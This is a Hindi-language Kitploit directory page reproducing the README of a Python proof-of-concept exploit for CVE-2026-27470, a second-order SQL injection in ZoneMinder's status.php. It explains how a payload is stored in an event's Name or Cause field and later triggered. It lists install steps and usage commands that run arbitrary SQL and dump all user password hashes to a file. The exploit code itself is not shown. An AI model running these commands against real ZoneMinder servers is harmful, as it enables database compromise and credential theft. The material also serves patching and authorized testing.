Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-27470-POC — # CVE-2026-27470 के लिए Python PoC, ZoneMinder के getNearEvents() (status.php) में प्रमाणित द्वितीय-क्रम SQL इंजेक्शन, CVSS 8.8 | Kitploit
उपकरण/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

# CVE-2026-27470 के लिए Python PoC, ZoneMinder के getNearEvents() (status.php) में प्रमाणित द्वितीय-क्रम SQL इंजेक्शन, CVSS 8.8

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27470 — ZoneMinder सेकंड-ऑर्डर SQL इंजेक्शन PoC

लेखक: d3vn0mi | CVSS 8.8 | प्रमाणित | इवेंट्स अनुमति आवश्यक

अवलोकन

CVE-2026-27470 ZoneMinder के web/ajax/status.php में एक सेकंड-ऑर्डर SQL इंजेक्शन भेद्यता है — विशेष रूप से getNearEvents() फ़ंक्शन में।

विवरणमान
प्रभावितZoneMinder <= 1.36.37 और 1.37.61 – 1.38.0
समाधान1.36.38 / 1.38.1
प्रकारसेकंड-ऑर्डर SQL इंजेक्शन
प्रमाणीकरण आवश्यकहाँ (इवेंट्स अनुमति वाला कोई भी उपयोगकर्ता)
CVSS8.8 (उच्च)

यह कैसे काम करता है

यह भेद्यता एक दो-चरणीय (सेकंड-ऑर्डर) SQL इंजेक्शन है:

  1. चरण 1 — संग्रहण: हमलावर किसी इवेंट का नाम बदलता है (या उसके Cause फ़ील्ड को संपादित करता है) ताकि उसमें SQL पेलोड शामिल हो। ZoneMinder इस लेखन के लिए पैरामीटराइज़्ड क्वेरी का उपयोग करता है, इसलिए पेलोड डेटाबेस में सुरक्षित रूप से संग्रहीत होता है — कोई WAF या फ़िल्टर इसे ब्लॉक नहीं करता।

  2. चरण 2 — ट्रिगर: हमलावर स्टेटस API के माध्यम से nearevents इकाई का अनुरोध करता है। getNearEvents() फ़ंक्शन संग्रहीत इवेंट Name/Cause को डेटाबेस से पढ़ता है और इसे बिना सैनिटाइज़ेशन के सीधे एक नई SQL क्वेरी में जोड़ता है, जिसके परिणामस्वरूप SQL इंजेक्शन होता है।

क्योंकि इंजेक्शन वेक्टर (संग्रहीत डेटा) ट्रिगर (एक स्वच्छ GET अनुरोध) से अलग है, यह अधिकांश इनपुट-स्तरीय सुरक्षाओं को बायपास करता है।

स्थापना

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

उपयोग

मूल — डेटाबेस संस्करण निकालें

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

कस्टम SQL क्वेरी

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

सभी उपयोगकर्ता और पासवर्ड हैश डंप करें

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

क्रेडेंशियल डिफ़ॉल्ट रूप से dumped_creds.txt में सहेजे जाते हैं।

परिणाम कस्टम फ़ाइल में सहेजें

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

प्रॉक्सी के माध्यम से रूट करें (Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

Name के बजाय Cause फ़ील्ड का उपयोग करें

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

इवेंट ID मैन्युअल रूप से निर्दिष्ट करें

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

वर्बोज़ / डीबग आउटपुट

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

विकल्प

फ़्लैगविवरणडिफ़ॉल्ट
-t, --targetलक्ष्य URL(आवश्यक)
-u, --usernameZoneMinder उपयोगकर्ता नाम(आवश्यक)
-p, --passwordZoneMinder पासवर्ड(आवश्यक)
--queryनिष्पादित करने के लिए SQL क्वेरीSELECT VERSION()
--dump-usersसभी उपयोगकर्ता नाम और पासवर्ड हैश डंप करें
-o, --outputपरिणाम फ़ाइल में सहेजेंdumped_creds.txt
--event-idइंजेक्शन वाहक के रूप में उपयोग करने के लिए इवेंट ID(स्वतः-पता लगाया गया)
--fieldइंजेक्शन फ़ील्ड: Name या CauseName
--no-restoreशोषण के बाद इवेंट नाम पुनर्स्थापित न करें
--proxyHTTP प्रॉक्सी URL
--timeoutअनुरोध टाइमआउट सेकंड में30
-v, --verboseडीबग लॉगिंग सक्षम करें

अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। इस टूल के किसी भी दुरुपयोग या क्षति के लिए लेखक ज़िम्मेदार नहीं हैं।

संदर्भ

  • ZoneMinder आधिकारिक साइट
  • ZoneMinder GitHub रिपॉज़िटरी
टूल डाउनलोड करें